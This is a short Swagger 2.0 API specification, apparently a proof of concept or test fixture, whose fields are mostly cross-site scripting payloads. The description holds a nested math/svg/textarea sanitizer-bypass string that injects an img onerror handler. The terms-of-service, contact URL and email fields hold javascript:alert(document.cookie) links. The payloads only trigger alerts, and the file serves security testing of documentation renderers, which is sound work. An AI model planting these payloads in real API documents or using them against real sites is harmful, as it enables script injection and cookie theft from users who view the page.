swagger: "2.0"
info: 
  title: "Swagger Sample App"
  description: "Please to click Terms of service<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
"
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support"
    url: "javascript:alert(document.cookie)"
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"
